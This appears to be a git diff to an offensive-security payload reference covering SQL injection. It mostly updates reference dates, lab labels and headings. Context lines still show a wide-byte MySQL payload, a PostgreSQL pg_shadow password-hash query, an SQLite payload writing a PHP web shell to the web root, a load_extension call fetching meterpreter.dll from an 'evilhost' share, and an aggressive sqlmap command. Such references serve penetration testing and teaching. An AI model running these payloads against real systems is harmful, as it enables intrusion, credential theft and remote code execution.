References addded for SQLi, Upload, SSTI, Type Juggling

SQL Injection/MySQL Injection.md

@@ -695,7 +695,7 @@ Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the back
 - [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
 - [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
 - [Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
-- [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - 2024](https://sqlwiki.netspi.com/injectionTypes/errorBased)
+- [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased)
 - [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
 - [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
 - [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://resources.infosecinstitute.com/sql-truncation-attack/)

SQL Injection/PostgreSQL Injection.md

@@ -71,11 +71,15 @@ SELECT usename FROM pg_user
 ```sql
 SELECT usename, passwd FROM pg_shadow 
 ```
+
 ## PostgreSQL List Database Administrator Accounts
+
 ```sql
 SELECT usename FROM pg_user WHERE usesuper IS TRUE
 ```
+
 ## PostgreSQL List Privileges
+
 Gather information from the [`pg_user`](https://www.postgresql.org/docs/current/view-pg-user.html) table:
 ```sql
 SELECT * FROM pg_user
@@ -155,6 +159,7 @@ Note, with the above queries, the output needs to be assembled in memory. For la
 ```
 
 ## PostgreSQL Time Based
+
 #### Identify time based
 
 ```sql

SQL Injection/README.md

@@ -354,17 +354,17 @@ Bypass using LIKE/NOT IN/IN/BETWEEN
 
 ## Labs 
 
-* [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
-* [SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
-* [SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
-* [SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)
+* [PortSwigger - SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
+* [PortSwigger - SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
+* [PortSwigger - SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
+* [PortSwigger - SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)
 
 
 ## References
 
 * [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection - Not So Secure - February 9, 2018](https://web.archive.org/web/20180209143119/https://www.notsosecure.com/analyzing-cve-2018-6376/)
 * [Manual SQL Injection Discovery Tips - Gerben Javado - August 26, 2017](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
-* [NetSPI SQL Injection Wiki - NetSPI - 2024](https://sqlwiki.netspi.com/)
+* [NetSPI SQL Injection Wiki - NetSPI - December 21, 2017](https://sqlwiki.netspi.com/)
 * [PentestMonkey's mySQL injection cheat sheet - @pentestmonkey - August 15, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
 * [SQLi Cheatsheet - NetSparker - March 19, 2022](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
 * [SQLi in INSERT worse than SELECT - Mathias Karlsson - Feb 14, 2017](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)

SQL Injection/SQLite Injection.md

@@ -12,8 +12,9 @@
 * [Boolean - Extract info](#boolean---extract-info)
 * [Boolean - Error based](#boolean---error-based)
 * [Time based](#time-based)
-* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
-* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
+* [Remote Code Execution](#remote-code-execution)
+    * [Attach Database](#attach-database)
+    * [Load_extension](#load_extension)
 * [References](#references)
 
 
@@ -100,7 +101,9 @@ AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
 ```
 
 
-## Remote Command Execution using SQLite command - Attach Database
+## Remote Code Execution
+
+### Attach Database
 
 ```sql
 ATTACH DATABASE '/var/www/lol.php' AS lol;
@@ -108,7 +111,7 @@ CREATE TABLE lol.pwn (dataz text);
 INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
 ```
 
-## Remote Command Execution using SQLite command - Load_extension
+### Load_extension
 
 ```sql
 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--

SQL Injection/SQLmap.md

@@ -24,12 +24,14 @@ However you should always know how SQLmap is working, and be able to replicate i
 * [SQLmap Without SQL Injection](#sqlmap-without-sql-injection)
 * [References](#references)
 
+
 ## Basic Arguments For SQLmap
 
 ```powershell
 sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
 ```
 
+
 ## Load A Request File
 
 A request file in SQLmap is a saved HTTP request that SQLmap reads and uses to perform SQL injection testing. This file allows you to provide a complete and custom HTTP request, which SQLmap can use to target more complex applications.